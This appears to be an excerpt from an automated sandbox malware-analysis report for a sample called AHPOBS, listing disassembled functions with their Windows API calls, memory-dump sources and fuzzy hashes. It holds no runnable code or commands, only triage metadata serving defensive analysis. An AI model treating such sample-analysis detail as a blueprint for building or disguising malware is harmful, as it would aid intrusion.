                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: DeleteDestroyObject$IconWindow
                                      • String ID:
                                      • API String ID: 3349847261-0
                                      • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                      • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                      • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                      • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                      Function 0044B5E8 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                      Download Yara Rule
                                      APIs
                                      • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                      • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                      • String ID:
                                      • API String ID: 2223660684-0
                                      • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                      • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                      • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                      • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                      Function 004472F1 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                        • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                        • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                      • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                      • LineTo.GDI32(?,?,?), ref: 00447326
                                      • EndPath.GDI32(?), ref: 00447336
                                      • StrokePath.GDI32(?), ref: 00447344
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                      • String ID:
                                      • API String ID: 2783949968-0
                                      • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                      • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                      • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                      • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                      Function 0043646A Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                      • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                      • AttachThreadInput.USER32(00000000), ref: 004364AA
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                      • String ID:
                                      • API String ID: 2710830443-0
                                      • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                      • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                      • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                      • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                      Function 0041514D Relevance: 6.0, APIs: 4, Instructions: 16threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __getptd_noexit.LIBCMT ref: 00415150
                                        • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                        • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                        • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                        • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                        • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                      • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                      • __freeptd.LIBCMT ref: 0041516B
                                      • ExitThread.KERNEL32 ref: 00415173
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                      • String ID:
                                      • API String ID: 1454798553-0
                                      • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                      • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                      • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                      • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                      Function 0042F373 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 370COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _strncmp
                                      • String ID: Q\E
                                      • API String ID: 909875538-2189900498
                                      • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                      • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                      • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                      • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                      Function 0044F3F4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _memmove_strncmp
                                      • String ID: U$\
                                      • API String ID: 2666721431-100911408
                                      • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                      • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                      • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                      • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                      Function 00467215 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181shareCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                      • __wcsnicmp.LIBCMT ref: 00467288
                                      • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                      • String ID: LPT
                                      • API String ID: 3035604524-1350329615
                                      • Opcode ID: 3b3dbf2697f36bc8cb764afbf437dd2aa6ce189acf07b49d6969421755f5c9d6
                                      • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                      • Opcode Fuzzy Hash: 3b3dbf2697f36bc8cb764afbf437dd2aa6ce189acf07b49d6969421755f5c9d6
                                      • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                      Function 0044F082 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID: \$h
                                      • API String ID: 4104443479-677774858
                                      • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                      • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                      • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                      • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                      Function 0043999F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _memcmp
                                      • String ID: &
                                      • API String ID: 2931989736-1010288
                                      • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                      • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                      • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                      • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                      Function 0044D3D5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID: \
                                      • API String ID: 4104443479-2967466578
                                      • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                      • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                      • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                      • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                      Function 004667E1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcslen.LIBCMT ref: 00466825
                                      • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: CrackInternet_wcslen
                                      • String ID: |
                                      • API String ID: 596671847-2343686810
                                      • Opcode ID: 7cb74d60865eca5b28057979f277cd03318605ef9fe3268a007aa21ef86e616b
                                      • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                      • Opcode Fuzzy Hash: 7cb74d60865eca5b28057979f277cd03318605ef9fe3268a007aa21ef86e616b
                                      • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                      Function 0044835A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: '
                                      • API String ID: 3850602802-1997036262
                                      • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                      • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                      • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                      • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                      Function 0040F850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                                      Download Yara Rule
                                      APIs
                                      • _strlen.LIBCMT ref: 0040F858
                                        • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                        • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                      • _sprintf.LIBCMT ref: 0040F9AE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _memmove$_sprintf_strlen
                                      • String ID: %02X
                                      • API String ID: 1921645428-436463671
                                      • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                      • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                      • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                      • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                      Function 00451006 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: Combobox
                                      • API String ID: 3850602802-2096851135
                                      • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                      • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                      • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                      • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                      Function 00451321 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
